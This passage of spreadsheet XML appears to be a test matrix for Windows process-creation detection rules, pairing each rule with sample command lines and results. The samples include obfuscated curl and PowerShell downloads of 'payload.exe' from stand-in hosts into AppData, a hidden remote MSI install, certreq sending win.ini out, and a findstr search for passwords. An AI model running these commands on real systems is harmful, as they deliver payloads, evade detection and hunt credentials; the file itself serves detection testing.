      <c r="D332" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E332" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G332" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J332" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="n"/>
      <c r="B333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C333" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D333" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E333" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G333" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J333" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="n"/>
      <c r="B334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C334" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D334" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E334" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G334" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K334" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="n"/>
      <c r="B335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C335" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D335" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E335" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G335" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H335" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="44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35" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K335" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="n"/>
      <c r="B336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C336" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D336" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E336" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G336" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I336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36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K336" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="n"/>
      <c r="B337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C337" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D337" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E337" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G337" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K337" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C338" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D338" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E338" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G338" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J338" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C339" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D339" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E339" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G339" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J339" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C340" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D340" s="44" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E340" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c type "\\malicious.server.com\share\payload.exe" &gt; C:\payload.exe</t>
        </is>
      </c>
      <c r="F340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H340" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I340" s="43" t="n"/>
      <c r="J340" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K340" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="n"/>
      <c r="B341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C341" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D341" s="44" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E341" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c type \\live.sysinternals.com\tools\Procmon.exe&gt;C:\temp\Procmon.exe</t>
        </is>
      </c>
      <c r="F341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H341" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I341" s="43" t="n"/>
      <c r="J341" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K341" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="n"/>
      <c r="B342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C342" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D342" s="44" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E342" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c type \\malicious.server.com\share\payload.exe&gt;&gt;C:\payload.exe</t>
        </is>
      </c>
      <c r="F342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H342" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I342" s="43" t="n"/>
      <c r="J342" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K342" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="n"/>
      <c r="B343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_susp_download</t>
        </is>
      </c>
      <c r="C343" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download</t>
        </is>
      </c>
      <c r="D343" s="44" t="inlineStr">
        <is>
          <t>e218595b-bbe7-4ee5-8a96-f32a24ad3468</t>
        </is>
      </c>
      <c r="E343" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd %TEMP% &amp;&amp; curl.exe -s -o payload.exe http://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H343" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I343" s="43" t="n"/>
      <c r="J343" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K343" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="n"/>
      <c r="B344" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_susp_download</t>
        </is>
      </c>
      <c r="C344" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download</t>
        </is>
      </c>
      <c r="D344" s="44" t="inlineStr">
        <is>
          <t>e218595b-bbe7-4ee5-8a96-f32a24ad3468</t>
        </is>
      </c>
      <c r="E344" s="43" t="inlineStr">
        <is>
          <t>curl.exe --create-dirs -o C:\Windows\Tasks\payload.dll http://example.com/payload.dll?download=1</t>
        </is>
      </c>
      <c r="F344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I344" s="43" t="n"/>
      <c r="J344" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K344" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_susp_execution</t>
        </is>
      </c>
      <c r="C345" s="44" t="inlineStr">
        <is>
          <t>Suspicious Desktopimgdownldr Command</t>
        </is>
      </c>
      <c r="D345" s="44" t="inlineStr">
        <is>
          <t>bb58aa4a-b80b-415a-a2c0-2f65a4c81009</t>
        </is>
      </c>
      <c r="E345" s="43" t="inlineStr">
        <is>
          <t>reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\"PersonalizationCSP"</t>
        </is>
      </c>
      <c r="F345" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G345" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H345" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I345" s="43" t="n"/>
      <c r="J345" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K345" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C346" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D346" s="44" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E346" s="44" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H346" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I346" s="43" t="n"/>
      <c r="J346" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K346" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="n"/>
      <c r="B347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ieexec_download</t>
        </is>
      </c>
      <c r="C347" s="44" t="inlineStr">
        <is>
          <t>File Download And Execution Via IEExec.EXE</t>
        </is>
      </c>
      <c r="D347" s="44" t="inlineStr">
        <is>
          <t>9801abb8-e297-4dbf-9fbd-57dde0e830ad</t>
        </is>
      </c>
      <c r="E347" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\IEExec.exe %TEMP%\not_ieexec.exe &amp;&amp; %TEMP%\not_ieexec.exe http://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F347" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G347" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H347" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I347" s="43" t="n"/>
      <c r="J347" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K347" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="n"/>
      <c r="B348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32</t>
        </is>
      </c>
      <c r="C348" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution</t>
        </is>
      </c>
      <c r="D348" s="44" t="inlineStr">
        <is>
          <t>aa8e035d-7be4-48d3-a944-102aec04400d</t>
        </is>
      </c>
      <c r="E348" s="44" t="inlineStr">
        <is>
          <t>extrac32.exe /C \\127.0.0.1\share\archive.zip C:\path\to\extract\file.txt</t>
        </is>
      </c>
      <c r="F348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H348" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I348" s="44" t="n"/>
      <c r="J348" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K348" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C349" s="44" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D349" s="44" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E349" s="44" t="inlineStr">
        <is>
          <t>certreq.exe  -Post  -config  [https://example.com](https://example.com) c:\windows\win.ini C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H349" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I349" s="43" t="n"/>
      <c r="J349" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K349" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C350" s="44" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D350" s="44" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E350" s="44" t="inlineStr">
        <is>
          <t>certreq.exe /Post /config [https://example.com](https://example.com) c:\windows\win.ini C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H350" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I350" s="43" t="n"/>
      <c r="J350" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K350" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B351" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C351" s="44" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D351" s="44" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E351" s="44" t="inlineStr">
        <is>
          <t>certreq.exe "-Post" "-config" [https://example.com](https://example.com) "C:\Windows\win.ini" C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H351" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K351" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="n"/>
      <c r="B352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C352" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D352" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E352" s="44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352" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="44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352" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K352" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="n"/>
      <c r="B353" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C353" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D353" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E353" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I353" s="43" t="n"/>
      <c r="J353" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K353" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="n"/>
      <c r="B354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C354" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D354" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E354" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I354" s="43" t="n"/>
      <c r="J354" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K354" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="n"/>
      <c r="B355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C355" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D355" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E355" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I355" s="44" t="n"/>
      <c r="J355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K355" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C356" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D356" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E356" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I356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56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K356" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C357" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D357" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E357" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I357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57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="n"/>
      <c r="B358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C358" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D358" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E358" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I358" s="44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58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K358" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="43" t="n"/>
      <c r="B359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C359" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D359" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E359" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F359" s="44" t="b">
        <v>1</v>
      </c>
